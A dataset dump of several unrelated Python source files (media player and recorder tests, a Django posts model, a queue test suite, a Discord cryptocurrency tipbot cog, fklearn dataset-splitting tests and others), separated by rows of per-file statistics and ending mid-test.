        path = self.create_audio_file('test.wav', sample_rate=48000)
        player = MediaPlayer(path)

        # check tracks
        self.assertIsNotNone(player.audio)
        self.assertIsNone(player.video)

        # read all frames
        self.assertEqual(player.audio.readyState, 'live')
        for i in range(50):
            frame = run(player.audio.recv())
            self.assertEqual(frame.format.name, 's16')
            self.assertEqual(frame.layout.name, 'stereo')
            self.assertEqual(frame.samples, 960)
            self.assertEqual(frame.sample_rate, 48000)
        with self.assertRaises(MediaStreamError):
            run(player.audio.recv())
        self.assertEqual(player.audio.readyState, 'ended')

    def test_video_file_png(self):
        path = self.create_video_file('test-%3d.png', duration=3)
        player = MediaPlayer(path)

        # check tracks
        self.assertIsNone(player.audio)
        self.assertIsNotNone(player.video)

        # read all frames
        self.assertEqual(player.video.readyState, 'live')
        for i in range(90):
            frame = run(player.video.recv())
            self.assertEqual(frame.width, 640)
            self.assertEqual(frame.height, 480)
        with self.assertRaises(MediaStreamError):
            run(player.video.recv())
        self.assertEqual(player.video.readyState, 'ended')

    def test_video_file_mp4(self):
        path = self.create_video_file('test.mp4', duration=3)
        player = MediaPlayer(path)

        # check tracks
        self.assertIsNone(player.audio)
        self.assertIsNotNone(player.video)

        # read all frames
        self.assertEqual(player.video.readyState, 'live')
        for i in range(90):
            frame = run(player.video.recv())
            self.assertEqual(frame.width, 640)
            self.assertEqual(frame.height, 480)
        with self.assertRaises(MediaStreamError):
            run(player.video.recv())
        self.assertEqual(player.video.readyState, 'ended')


class MediaRecorderTest(MediaTestCase):
    def test_audio_mp3(self):
        path = self.temporary_path('test.mp3')
        recorder = MediaRecorder(path)
        recorder.addTrack(AudioStreamTrack())
        run(recorder.start())
        run(asyncio.sleep(2))
        run(recorder.stop())

        # check output media
        container = av.open(path, 'r')
        self.assertEqual(len(container.streams), 1)
        self.assertIn(container.streams[0].codec.name, ('mp3', 'mp3float'))
        self.assertGreater(
            float(container.streams[0].duration * container.streams[0].time_base), 0)

    def test_audio_wav(self):
        path = self.temporary_path('test.wav')
        recorder = MediaRecorder(path)
        recorder.addTrack(AudioStreamTrack())
        run(recorder.start())
        run(asyncio.sleep(2))
        run(recorder.stop())

        # check output media
        container = av.open(path, 'r')
        self.assertEqual(len(container.streams), 1)
        self.assertEqual(container.streams[0].codec.name, 'pcm_s16le')
        self.assertGreater(
            float(container.streams[0].duration * container.streams[0].time_base), 0)

    def test_audio_wav_ended(self):
        track = AudioStreamTrack()

        recorder = MediaRecorder(self.temporary_path('test.wav'))
        recorder.addTrack(track)
        run(recorder.start())
        run(asyncio.sleep(1))
        track.stop()
        run(asyncio.sleep(1))

        run(recorder.stop())

    def test_audio_and_video(self):
        path = self.temporary_path('test.mp4')
        recorder = MediaRecorder(path)
        recorder.addTrack(AudioStreamTrack())
        recorder.addTrack(VideoStreamTrack())
        run(recorder.start())
        run(asyncio.sleep(2))
        run(recorder.stop())

        # check output media
        container = av.open(path, 'r')
        self.assertEqual(len(container.streams), 2)
        self.assertEqual(container.streams[0].codec.name, 'aac')
        self.assertGreater(
            float(container.streams[0].duration * container.streams[0].time_base), 0)
        self.assertEqual(container.streams[1].codec.name, 'h264')
        self.assertEqual(container.streams[1].width, 640)
        self.assertEqual(container.streams[1].height, 480)
        self.assertGreater(
            float(container.streams[1].duration * container.streams[1].time_base), 0)

    def test_video_png(self):
        path = self.temporary_path('test-%3d.png')
        recorder = MediaRecorder(path)
        recorder.addTrack(VideoStreamTrack())
        run(recorder.start())
        run(asyncio.sleep(2))
        run(recorder.stop())

        # check output media
        container = av.open(path, 'r')
        self.assertEqual(len(container.streams), 1)
        self.assertEqual(container.streams[0].codec.name, 'png')
        self.assertGreater(
            float(container.streams[0].duration * container.streams[0].time_base), 0)
        self.assertEqual(container.streams[0].width, 640)
        self.assertEqual(container.streams[0].height, 480)

    def test_video_mp4(self):
        path = self.temporary_path('test.mp4')
        recorder = MediaRecorder(path)
        recorder.addTrack(VideoStreamTrack())
        run(recorder.start())
        run(asyncio.sleep(2))
        run(recorder.stop())

        # check output media
        container = av.open(path, 'r')
        self.assertEqual(len(container.streams), 1)
        self.assertEqual(container.streams[0].codec.name, 'h264')
        self.assertGreater(
            float(container.streams[0].duration * container.streams[0].time_base), 0)
        self.assertEqual(container.streams[0].width, 640)
        self.assertEqual(container.streams[0].height, 480)
| 33.361111 | 97 | 0.633118 | 1,062 | 9,608 | 5.655367 | 0.138418 | 0.08991 | 0.05378 | 0.034799 | 0.767066 | 0.720779 | 0.677656 | 0.660506 | 0.640193 | 0.632201 | 0 | 0.021589 | 0.247918 | 9,608 | 287 | 98 | 33.477352 | 0.809577 | 0.02373 | 0 | 0.666667 | 0 | 0 | 0.02189 | 0 | 0 | 0 | 0 | 0 | 0.255708 | 1 | 0.091324 | false | 0 | 0.050228 | 0.004566 | 0.173516 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
f214f18d6d3f2d1b56c4ab05f98bd982fbe2ce0e | 356 | py | Python | pynex02.py | arunkumarang/python | 1960e285dfe2ef54d2e3ab37584bfef8b24ecca9 | [
"Apache-2.0"
] | null | null | null | pynex02.py | arunkumarang/python | 1960e285dfe2ef54d2e3ab37584bfef8b24ecca9 | [
"Apache-2.0"
] | null | null | null | pynex02.py | arunkumarang/python | 1960e285dfe2ef54d2e3ab37584bfef8b24ecca9 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python -tt
import sys


def main():
    prevnum = 0
    N = int(input('Enter the range value: '))
    for curnum in range(0, N):
        sumval = prevnum + curnum
        print('prev num: %d, curr num: %d, sum (prev + curr): %d' % (prevnum, curnum, sumval))
        prevnum = curnum


if __name__ == '__main__':
    main()
    sys.exit(0)
| 18.736842 | 94 | 0.553371 | 49 | 356 | 3.857143 | 0.612245 | 0.206349 | 0.201058 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011858 | 0.289326 | 356 | 18 | 95 | 19.777778 | 0.735178 | 0.05618 | 0 | 0 | 0 | 0 | 0.24024 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.090909 | 0 | 0.181818 | 0.090909 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
f2177899c1f7e3bb1b260d349ee41e6e898f5063 | 257 | py | Python | output/models/nist_data/list_pkg/id/schema_instance/nistschema_sv_iv_list_id_min_length_5_xsd/__init__.py | tefra/xsdata-w3c-tests | b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f | [
"MIT"
] | 1 | 2021-08-14T17:59:21.000Z | 2021-08-14T17:59:21.000Z | output/models/nist_data/list_pkg/id/schema_instance/nistschema_sv_iv_list_id_min_length_5_xsd/__init__.py | tefra/xsdata-w3c-tests | b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f | [
"MIT"
] | 4 | 2020-02-12T21:30:44.000Z | 2020-04-15T20:06:46.000Z | output/models/nist_data/list_pkg/id/schema_instance/nistschema_sv_iv_list_id_min_length_5_xsd/__init__.py | tefra/xsdata-w3c-tests | b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f | [
"MIT"
] | null | null | null | from output.models.nist_data.list_pkg.id.schema_instance.nistschema_sv_iv_list_id_min_length_5_xsd.nistschema_sv_iv_list_id_min_length_5 import (
    NistschemaSvIvListIdMinLength5,
    Out,
)

__all__ = [
    "NistschemaSvIvListIdMinLength5",
    "Out",
]
| 25.7 | 145 | 0.805447 | 33 | 257 | 5.606061 | 0.636364 | 0.12973 | 0.151351 | 0.194595 | 0.324324 | 0.324324 | 0.324324 | 0.324324 | 0 | 0 | 0 | 0.017621 | 0.116732 | 257 | 9 | 146 | 28.555556 | 0.797357 | 0 | 0 | 0 | 0 | 0 | 0.128405 | 0.116732 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
f21e7b555dcbe92ee36f1b6a0557a58d2bd4b847 | 652 | py | Python | alerter/src/channels_manager/handlers/handler.py | SimplyVC/panic | 2f5c327ea0d14b6a49dc8f4599a255048bc2ff6d | [
"Apache-2.0"
] | 41 | 2019-08-23T12:40:42.000Z | 2022-03-28T11:06:02.000Z | alerter/src/channels_manager/handlers/handler.py | SimplyVC/panic | 2f5c327ea0d14b6a49dc8f4599a255048bc2ff6d | [
"Apache-2.0"
] | 147 | 2019-08-30T22:09:48.000Z | 2022-03-30T08:46:26.000Z | alerter/src/channels_manager/handlers/handler.py | SimplyVC/panic | 2f5c327ea0d14b6a49dc8f4599a255048bc2ff6d | [
"Apache-2.0"
] | 3 | 2019-09-03T21:12:28.000Z | 2021-08-18T14:27:56.000Z | import logging
from abc import ABC
from src.abstract.publisher_subscriber import PublisherSubscriberComponent
from src.message_broker.rabbitmq import RabbitMQApi
class ChannelHandler(PublisherSubscriberComponent, ABC):
def __init__(self, handler_name: str, logger: logging.Logger,
rabbitmq: RabbitMQApi) -> None:
super().__init__(logger, rabbitmq)
self._handler_name = handler_name
def __str__(self) -> str:
return self.handler_name
@property
def handler_name(self) -> str:
return self._handler_name
def _listen_for_data(self) -> None:
self.rabbitmq.start_consuming()
| 27.166667 | 74 | 0.717791 | 73 | 652 | 6.054795 | 0.424658 | 0.149321 | 0.135747 | 0.076923 | 0.126697 | 0.126697 | 0 | 0 | 0 | 0 | 0 | 0 | 0.205521 | 652 | 23 | 75 | 28.347826 | 0.853282 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.25 | 0.125 | 0.6875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
f2272804f4c27a4d70c3cd71b8a2757e1fc1891c | 1,672 | py | Python | meh/vermin/models.py | comandrei/meh | 716d2260e99df969a6672e259b1f79d6ef08d499 | [
"MIT"
] | null | null | null | meh/vermin/models.py | comandrei/meh | 716d2260e99df969a6672e259b1f79d6ef08d499 | [
"MIT"
] | null | null | null | meh/vermin/models.py | comandrei/meh | 716d2260e99df969a6672e259b1f79d6ef08d499 | [
"MIT"
] | null | null | null | from django.conf import settings
from django.db import models
from .tasks import generate_thumbnail, send_email
THUMBNAIL_SIZES = [
    (120, 120),
    (90, 90)
]


class Post(models.Model):
    author = models.ForeignKey(settings.AUTH_USER_MODEL)
    created = models.DateTimeField(auto_now_add=True)
    text = models.TextField()
    image = models.ImageField(upload_to="posts",
                              null=True, blank=True)

    def save(self, *args, **kwargs):
        post = super(Post, self).save(*args, **kwargs)
        if self.image:
            for size in THUMBNAIL_SIZES:
                generate_thumbnail(self.image.path, size)
        return post


class Meh(models.Model):
    created = models.DateTimeField(auto_now_add=True)
    author = models.ForeignKey(settings.AUTH_USER_MODEL)
    post = models.ForeignKey(Post)

    def save(self, *args, **kwargs):
        meh = super(Meh, self).save(*args, **kwargs)
        send_email(to=self.post.author.email,
                   from_email=self.author.email,
                   subject="{} mehed your post {}".format(self.author, self.post),
                   text="trololo")
        return meh


class Eh(models.Model):
    created = models.DateTimeField(auto_now_add=True)
    author = models.ForeignKey(settings.AUTH_USER_MODEL)
    post = models.ForeignKey(Post)

    def save(self, *args, **kwargs):
        eh = super(Eh, self).save(*args, **kwargs)
        send_email(to=self.post.author.email,
                   from_email=self.author.email,
                   subject="{} ehed your post {}".format(self.author, self.post),
                   text="trololololo")
        return eh
| 31.54717 | 87 | 0.620215 | 202 | 1,672 | 5.024752 | 0.287129 | 0.059113 | 0.065025 | 0.08867 | 0.610837 | 0.590148 | 0.590148 | 0.552709 | 0.508374 | 0.429557 | 0 | 0.008084 | 0.260167 | 1,672 | 52 | 88 | 32.153846 | 0.812449 | 0 | 0 | 0.365854 | 1 | 0 | 0.044258 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.073171 | false | 0 | 0.073171 | 0 | 0.536585 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
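Post.save above hands each (width, height) pair in THUMBNAIL_SIZES to generate_thumbnail, which lives in .tasks and is not shown in this record. As a rough, dependency-free sketch of the fit-within-box arithmetic such a task typically performs (fit_within is a hypothetical helper, not part of this repo):

```python
def fit_within(src_w, src_h, box_w, box_h):
    """Scale (src_w, src_h) to fit inside (box_w, box_h), keeping aspect ratio."""
    scale = min(box_w / src_w, box_h / src_h)
    # Never collapse a dimension to zero for extreme aspect ratios.
    return max(1, round(src_w * scale)), max(1, round(src_h * scale))

# A 1920x1080 upload against the two sizes used above:
for size in [(120, 120), (90, 90)]:
    print(fit_within(1920, 1080, *size))  # (120, 68) then (90, 51)
```

A real task would then pass the resulting dimensions to an imaging library (e.g. Pillow's `Image.thumbnail`) and save the output next to the original.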
1ef3f84f7b0db6b939c14c8d8ef90faa611b7481 | 2,265 | py | Python | circular_buffer/tests/test_queue.py | mrakitin/circular_buffer | 5da8bd4d94324b2460d44ed11036747a885550a5 | [
"BSD-3-Clause"
] | null | null | null | circular_buffer/tests/test_queue.py | mrakitin/circular_buffer | 5da8bd4d94324b2460d44ed11036747a885550a5 | [
"BSD-3-Clause"
] | null | null | null | circular_buffer/tests/test_queue.py | mrakitin/circular_buffer | 5da8bd4d94324b2460d44ed11036747a885550a5 | [
"BSD-3-Clause"
] | null | null | null | #!/bin/env python
# -*- coding: utf-8 -*-
"""test Queue
by Valentyn Stadnytskyi
created: August 2, 2019

This is a test library to evaluate the performance of the code.
A queue is an abstract data structure, somewhat similar to a stack. Unlike a stack, a queue is open at both ends:
one end is always used to insert data (enqueue) and the other is used to remove data (dequeue).

to run unittest: python3 -m unittest test_queue
"""
from __future__ import print_function
from copy import copy, deepcopy
import pickle
import unittest

import numpy as np
from numpy.testing import assert_, assert_almost_equal, assert_equal
from numpy import zeros

from ..queue import Queue


class QueueTest(unittest.TestCase):

    def test_queue_end(self):
        queue = Queue(shape=(100, 2))
        self.assertEqual(queue.rear, 0)

    def test_1(self):
        from numpy import std, random
        queue = Queue(shape=(100, 2))
        data = random.randint(1024, size=(5, 2))
        queue.enqueue(data)
        self.assertEqual(queue.length, 5)
        self.assertEqual(queue.rear, 5)
        queue.enqueue(data)
        dequeue_data = queue.dequeue(N=3)
        self.assertEqual(queue.length, 7)
        self.assertEqual(std(dequeue_data), std(data[:3]))

    def test_attributes(self):
        from numpy import std, random
        queue = Queue(shape=(100, 2), dtype='int16')
        data = random.randint(1024, size=(5, 2))
        self.assertEqual(queue.isempty, True)
        queue.enqueue(data)
        self.assertEqual(queue.length, 5)
        self.assertEqual(queue.rear, 5)
        self.assertEqual(queue.shape, (100, 2))
        self.assertEqual(queue.size, 100 * 2)
        self.assertEqual(queue.dtype, 'int16')
        self.assertEqual(queue.isfull, False)
        self.assertEqual(queue.isempty, False)

    def test_reshape(self):
        queue = Queue(shape=(100, 2), dtype='int16')
        queue.reshape(shape=(50, 2), dtype='float64')
        self.assertEqual(queue.length, 0)
        self.assertEqual(queue.rear, 0)
        self.assertEqual(queue.shape, (50, 2))
        self.assertEqual(queue.size, 50 * 2)
        self.assertEqual(queue.dtype, 'float64')
| 33.80597 | 118 | 0.638852 | 297 | 2,265 | 4.814815 | 0.333333 | 0.188811 | 0.237762 | 0.088112 | 0.365035 | 0.282517 | 0.273427 | 0.160839 | 0.160839 | 0.160839 | 0 | 0.043144 | 0.25298 | 2,265 | 66 | 119 | 34.318182 | 0.802009 | 0.186755 | 0 | 0.386364 | 0 | 0 | 0.016628 | 0 | 0 | 0 | 0 | 0 | 0.431818 | 1 | 0.090909 | false | 0 | 0.227273 | 0 | 0.340909 | 0.022727 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
1ef6f3ef3adc8a7a5eac9bad221a2ca468d9827c | 600 | py | Python | src/metaworlds/envs/mujoco/hill/swimmer3d_hill_env.py | rlworkgroup/metaworlds | be03cfed9890a37b84283c597209b849e8a086cc | [
"MIT"
] | 5 | 2019-02-27T20:55:30.000Z | 2019-08-24T19:24:41.000Z | src/metaworlds/envs/mujoco/hill/swimmer3d_hill_env.py | rlworkgroup/metaworlds | be03cfed9890a37b84283c597209b849e8a086cc | [
"MIT"
] | 8 | 2019-02-28T04:07:10.000Z | 2020-01-02T10:54:10.000Z | src/metaworlds/envs/mujoco/hill/swimmer3d_hill_env.py | rlworkgroup/metaworlds | be03cfed9890a37b84283c597209b849e8a086cc | [
"MIT"
] | 1 | 2021-09-13T18:35:34.000Z | 2021-09-13T18:35:34.000Z | import gym
import numpy as np

from metaworlds.envs.mujoco import Swimmer3DEnv
from metaworlds.envs.mujoco.hill import HillEnv
from metaworlds.envs.mujoco.hill import terrain
from metaworlds.misc.overrides import overrides


class Swimmer3DHillEnv(HillEnv):

    MODEL_CLASS = Swimmer3DEnv

    @overrides
    def _mod_hfield(self, hfield):
        # clear a flat patch for the robot to start off from
        return terrain.clear_patch(
            hfield,
            gym.spaces.Box(
                np.array([-3.0, -1.5]),
                np.array([0.0, -0.5]),
                dtype=np.float32))
| 26.086957 | 60 | 0.653333 | 78 | 600 | 4.974359 | 0.538462 | 0.14433 | 0.139175 | 0.185567 | 0.175258 | 0.175258 | 0 | 0 | 0 | 0 | 0 | 0.029345 | 0.261667 | 600 | 22 | 61 | 27.272727 | 0.846501 | 0.083333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.375 | 0.0625 | 0.625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
480af7af3652c8750c3fafdaec5670c31e2395bb | 9,512 | py | Python | tip.py | umbru/discord-tipbot | 676db892035bcf20213677c3e7a740a9ec29ab8d | [
"MIT"
] | null | null | null | tip.py | umbru/discord-tipbot | 676db892035bcf20213677c3e7a740a9ec29ab8d | [
"MIT"
] | 1 | 2019-11-04T04:25:06.000Z | 2019-11-04T08:44:14.000Z | tip.py | umbru/discord-tipbot | 676db892035bcf20213677c3e7a740a9ec29ab8d | [
"MIT"
] | 2 | 2019-11-03T10:31:09.000Z | 2020-11-21T17:37:26.000Z | from bitcoinrpc.authproxy import AuthServiceProxy, JSONRPCException
from decimal import Decimal

import discord
from discord.ext import commands

import user_db
import config

rpc_connection = 'http://{0}:{1}@{2}:{3}'.format(config.rpc_user, config.rpc_password, config.ip, config.rpc_port)


def str_isfloat(value):
    try:
        float(value)
        return True
    except ValueError:
        return False


class Tip(commands.Cog):
    def __init__(self, bot):
        self.bot = bot

    @commands.command()
    async def tip(self, ctx, mention=None, amount=None):
        client = AuthServiceProxy(rpc_connection)
        user_id = str(ctx.author.id)
        user_name = ctx.author.name
        if not user_db.check_user(user_id):
            user_db.add_user(user_id, user_name)
            embed = discord.Embed(
                title="**How may I be of service?**",
                color=0x7152b6)
            embed.set_author(
                name=ctx.author.display_name,
                icon_url=ctx.author.avatar_url_as(format='png', size=256))
            embed.add_field(
                name="To see all my available commands type `!help`",
                value="If you have any issues please let one of the team know.")
            embed.set_thumbnail(url=self.bot.user.avatar_url_as(format='png', size=1024))
            embed.set_footer(text="TipBot v{0}".format(config.VERSION), icon_url=self.bot.user.avatar_url_as(format='png', size=256))
            await ctx.channel.send(embed=embed)

        if mention is None or amount is None:
            embed = discord.Embed(color=0xffd800)
            embed.set_author(
                name=ctx.author.display_name,
                icon_url=ctx.author.avatar_url_as(format='png', size=256))
            embed.add_field(
                name="No user or amount specified. Please check **!help** for information.",
                value=" :warning: :warning: :warning: ")
            embed.set_footer(
                text="TipBot v{0}".format(config.VERSION),
                icon_url=self.bot.user.avatar_url_as(format='png', size=256))
            await ctx.channel.send(embed=embed)
        elif not str_isfloat(amount):
            embed = discord.Embed(color=0xff0000)
            embed.set_author(
                name=ctx.author.display_name,
                icon_url=ctx.author.avatar_url_as(format='png', size=256))
            embed.add_field(
                name="Invalid tip amount. Please check **!help** for information.",
                value="`{0}`".format(amount))
            embed.set_footer(text="TipBot v{0}".format(config.VERSION), icon_url=self.bot.user.avatar_url_as(format='png', size=256))
            await ctx.channel.send(embed=embed)
        else:
            tipfrom = str(ctx.author.id)
            tipto = str(mention.replace('<@', '').replace('>', ''))
            amount = Decimal(str(float(amount)))
            if amount < Decimal('0.01'):
                embed = discord.Embed(color=0xff0000)
                embed.set_author(
                    name=ctx.author.display_name,
                    icon_url=ctx.author.avatar_url_as(format='png', size=256))
                embed.add_field(
                    name="Tip amount must be at least 0.01 UMBRU",
                    value="`{0}`".format(amount))
                embed.set_footer(text="TipBot v{0}".format(config.VERSION), icon_url=self.bot.user.avatar_url_as(format='png', size=256))
                await ctx.channel.send(embed=embed)
            else:
                if len(tipto) != 18 and len(tipto) != 17:
                    embed = discord.Embed(color=0xff0000)
                    embed.set_author(
                        name=ctx.author.display_name,
                        icon_url=ctx.author.avatar_url_as(format='png', size=256))
                    embed.add_field(
                        name="Invalid User. Please check **!help** for information.",
                        value="`{0}`".format(str(mention)))
                    embed.set_footer(text="TipBot v{0}".format(config.VERSION), icon_url=self.bot.user.avatar_url_as(format='png', size=256))
                    await ctx.channel.send(embed=embed)
                elif tipfrom == tipto:
                    embed = discord.Embed(color=0xff0000)
                    embed.set_author(
                        name=ctx.author.display_name,
                        icon_url=ctx.author.avatar_url_as(format='png', size=256))
                    embed.add_field(
                        name="Sorry you cannot tip yourself!",
                        value=" :wink: ")
                    embed.set_footer(text="TipBot v{0}".format(config.VERSION), icon_url=self.bot.user.avatar_url_as(format='png', size=256))
                    await ctx.channel.send(embed=embed)
                elif amount > client.getbalance(tipfrom, config.CONFIRM):
                    embed = discord.Embed(color=0xff0000)
                    embed.set_author(
                        name=ctx.author.display_name,
                        icon_url=ctx.author.avatar_url_as(format='png', size=256))
                    embed.add_field(
                        name="Sorry you do not have enough UMBRU for that.",
                        value="Your balance is: **{0} UMBRU**".format(client.getbalance(tipfrom, config.CONFIRM)))
                    embed.set_footer(text="TipBot v{0}".format(config.VERSION), icon_url=self.bot.user.avatar_url_as(format='png', size=256))
                    await ctx.channel.send(embed=embed)
                else:
                    if tipto == str(self.bot.user.id):
                        try:
                            move_istrue = client.move(tipfrom, 'tipbot_wallet', float(amount))
                        except JSONRPCException:
                            # The wallet RPC rejected the transfer; report it and skip the success path.
                            move_istrue = False
                            embed = discord.Embed(color=0xff0000)
                            embed.set_author(
                                name=ctx.author.display_name,
                                icon_url=ctx.author.avatar_url_as(format='png', size=256))
                            embed.add_field(
                                name="Invalid tip amount. Please check **!help** for information.",
                                value="`{0}`".format(amount))
                            embed.set_footer(text="TipBot v{0}".format(config.VERSION), icon_url=self.bot.user.avatar_url_as(format='png', size=256))
                            await ctx.channel.send(embed=embed)
                        if move_istrue:
                            embed = discord.Embed(color=0x7152b6)
                            embed.set_author(
                                name=ctx.author.display_name,
                                icon_url=ctx.author.avatar_url_as(format='png', size=256))
                            embed.add_field(
                                name="Thank you for the donation!",
                                value="**{0} UMBRU**".format(amount))
                            embed.set_footer(text="TipBot v{0}".format(config.VERSION), icon_url=self.bot.user.avatar_url_as(format='png', size=256))
                            await ctx.channel.send(embed=embed)
                    else:
                        try:
                            move_istrue = client.move(tipfrom, tipto, float(amount))
                        except JSONRPCException:
                            # The wallet RPC rejected the transfer; report it and skip the success path.
                            move_istrue = False
                            embed = discord.Embed(color=0xff0000)
                            embed.set_author(
                                name=ctx.author.display_name,
                                icon_url=ctx.author.avatar_url_as(format='png', size=256))
                            embed.add_field(
                                name="Invalid tip amount. Please check **!help** for information.",
                                value="`{0}`".format(amount))
                            embed.set_footer(text="TipBot v{0}".format(config.VERSION), icon_url=self.bot.user.avatar_url_as(format='png', size=256))
                            await ctx.channel.send(embed=embed)
                        if move_istrue:
                            embed = discord.Embed(color=0x7152b6)
                            embed.set_author(
                                name=ctx.author.display_name,
                                icon_url=ctx.author.avatar_url_as(format='png', size=256))
                            embed.add_field(
                                name="{0} has tipped {1} `{2} UMBRU`".format(ctx.author.display_name,
                                                                             self.bot.get_user(int(tipto)).display_name,
                                                                             amount),
                                value="Spend it wisely!")
                            embed.set_footer(text="TipBot v{0}".format(config.VERSION), icon_url=self.bot.user.avatar_url_as(format='png', size=256))
                            await ctx.channel.send(embed=embed)


def setup(bot):
    bot.add_cog(Tip(bot)) | 53.740113 | 153 | 0.488436 | 1,001 | 9,512 | 4.498502 | 0.14985 | 0.051965 | 0.056185 | 0.086831 | 0.72374 | 0.72374 | 0.686875 | 0.686875 | 0.67777 | 0.67777 | 0 | 0.028607 | 0.404647 | 9,512 | 177 | 154 | 53.740113 | 0.766555 | 0 | 0 | 0.608974 | 0 | 0 | 0.099968 | 0 | 0 | 0 | 0.009251 | 0 | 0 | 0 | 1 | 0.019231 | false | 0.019231 | 0.038462 | 0 | 0.076923 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
481bdfbc9af2d8828c835c81b26e78c7c7419e64 | 11,757 | py | Python | tests/preprocessing/test_splitting.py | diegoarri91/fklearn | d240e6605a515ee446f34c5ddb9778dc16562056 | [
"Apache-2.0"
] | null | null | null | tests/preprocessing/test_splitting.py | diegoarri91/fklearn | d240e6605a515ee446f34c5ddb9778dc16562056 | [
"Apache-2.0"
] | null | null | null | tests/preprocessing/test_splitting.py | diegoarri91/fklearn | d240e6605a515ee446f34c5ddb9778dc16562056 | [
"Apache-2.0"
] | null | null | null | from collections import Counter

import hypothesis.strategies as st
import pandas as pd
from hypothesis import given
from hypothesis.extra.pandas import columns, data_frames, range_indexes
from pandas.testing import assert_frame_equal

from fklearn.preprocessing.splitting import space_time_split_dataset, time_split_dataset, stratified_split_dataset

df = pd.DataFrame(
    {
        'space': ['space1', 'space2', 'space1', 'space2', 'space1', 'space2'],
        'time': [pd.to_datetime("2016-10-01"), pd.to_datetime("2016-10-01"), pd.to_datetime("2016-11-01"),
                 pd.to_datetime("2016-11-01"), pd.to_datetime("2016-12-01"), pd.to_datetime("2016-12-01")]
    }
)

df_with_new_id = pd.DataFrame(
    {
        'space': ['space1', 'space2', 'space1', 'space2', 'space1', 'space2', 'space3'],
        'time': [pd.to_datetime("2016-10-01"), pd.to_datetime("2016-10-01"), pd.to_datetime("2016-11-01"),
                 pd.to_datetime("2016-11-01"), pd.to_datetime("2016-12-01"), pd.to_datetime("2016-12-01"),
                 pd.to_datetime("2016-11-01")]
    }
)

df_only_one_point_per_id = pd.DataFrame(
    {
        'space': ['space1', 'space2', 'space3', 'space4'],
        'time': [pd.to_datetime("2016-10-01"), pd.to_datetime("2016-10-01"), pd.to_datetime("2016-11-01"),
                 pd.to_datetime("2016-11-01")]
    }
)

MAX_STRATIFIED_SPLIT_SIZE_DIFFERENCE = 1


def test_time_split_dataset(test_df=df):
    in_time_train_set, out_time_test_set = time_split_dataset(dataset=test_df,
                                                              train_start_date="2016-10-01",
                                                              train_end_date="2016-11-01",
                                                              holdout_end_date="2016-12-01",
                                                              time_column="time")

    expected_train = pd.DataFrame(
        {
            'space': ['space1', 'space2'],
            'time': [pd.to_datetime("2016-10-01"), pd.to_datetime("2016-10-01")]
        }
    )

    expected_test = pd.DataFrame({
        'space': ['space1', 'space2'],
        'time': [pd.to_datetime("2016-11-01"), pd.to_datetime("2016-11-01")]
    })

    assert in_time_train_set.reset_index(drop=True).equals(expected_train)
    assert out_time_test_set.reset_index(drop=True).equals(expected_test)

    # Testing optional argument `holdout_start_date`
    in_time_train_set, out_time_test_set = time_split_dataset(dataset=test_df,
                                                              train_start_date="2016-10-01",
                                                              train_end_date="2016-11-01",
                                                              holdout_start_date="2016-11-03",
                                                              holdout_end_date="2017-01-01",
                                                              time_column="time")

    expected_train = pd.DataFrame({
        'space': ['space1', 'space2'],
